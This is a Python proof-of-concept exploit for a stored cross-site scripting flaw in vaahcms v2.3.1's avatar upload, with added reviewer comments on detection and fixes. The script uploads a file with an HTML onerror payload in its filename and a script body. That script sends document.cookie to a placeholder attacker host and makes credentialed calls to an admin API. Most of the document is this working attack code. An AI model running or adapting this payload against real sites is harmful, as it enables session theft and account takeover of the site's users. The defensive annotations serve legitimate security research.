Cross Site Scripting in vaahcms v.2.3.1 allows a remote attacker to execute arbitrary code via the upload method of storeAvatar() in UserBase.php
The following code is for security research and authorized testing only.
python
# CVE-2025-61183 PoC - vaahcms v2.3.1 Stored XSS via storeAvatar()
# Exploit: Upload a malicious file as avatar to execute arbitrary JavaScript
#
# Reviewer notes (defensive reading of this script):
# - Two attacker-controlled values reach the server in one multipart POST:
#   the filename (which embeds HTML) and the file body (script text sent
#   under a client-declared "image/jpeg" content type). The script does not
#   say which of the two the vulnerable code reflects, so both are the
#   untrusted inputs a fix has to validate.
# - No cookie, token or Authorization header is sent below, so whether the
#   endpoint is reachable without a logged-in session cannot be told from
#   this script alone — confirm against the advisory.
# - Everything runs at module level: importing this file executes the request.
import requests
TARGET_URL: str = "http://target-vaahcms-site.com"  # placeholder host from the PoC, not a real target
UPLOAD_ENDPOINT: str = "/api/vaah/users/avatar" # storeAvatar() method endpoint
# Step 1: Create a malicious payload file
# The malicious file contains XSS payload that will execute when the avatar is rendered
# The filename itself carries an HTML tag with an event handler; any place the
# stored name is rendered without HTML escaping is a sink. Detection hint:
# multipart uploads whose filename contains '<', '>' or an on*= attribute.
malicious_filename: str = 'avatar<img src=x onerror=alert(document.cookie)>.jpg'
# JavaScript payload to steal cookies or perform actions
# The body is plain script text, not image data — a server that checks the
# file's magic bytes instead of trusting the declared MIME type rejects it.
# The exfiltration host inside it is a PoC placeholder; an outbound request
# to an unexpected host carrying document.cookie is the artifact to hunt for
# in proxy logs (cookies flagged HttpOnly are not readable by this payload).
xss_payload: str = '''
<script>
// Steal session cookies
var img = new Image();
img.src = "http://attacker-server.com/steal?cookie=" + document.cookie;
// Or perform actions on behalf of the victim
fetch('/api/admin/users', {credentials: 'include'});
</script>
'''
# Step 2: Upload the malicious avatar
# Only a browser-like UA and an Accept header; no session material is attached.
headers: dict[str, str] = {
"User-Agent": "Mozilla/5.0",
"Accept": "application/json"
}
# Field name "avatar"; tuple is (filename, body, declared content type).
# NOTE(review): server-side fix points — regenerate the stored filename rather
# than keeping the client's, verify the body is a real image, and HTML-escape
# the name wherever it is rendered.
files: dict[str, tuple[str, str, str]] = {
"avatar": (malicious_filename, xss_payload, "image/jpeg")
}
# Step 3: Send the upload request
response = requests.post(
TARGET_URL + UPLOAD_ENDPOINT,
files=files,
headers=headers
)
print(f"Upload Status: {response.status_code}")
print(f"Response: {response.text}")
# Step 4: When any user views the profile with this avatar,
# the XSS payload will execute in their browser context
# NOTE: this line prints unconditionally; it does not check
# response.status_code, so "successfully" is not verified here.
print("Payload uploaded successfully. XSS will trigger when avatar is viewed.")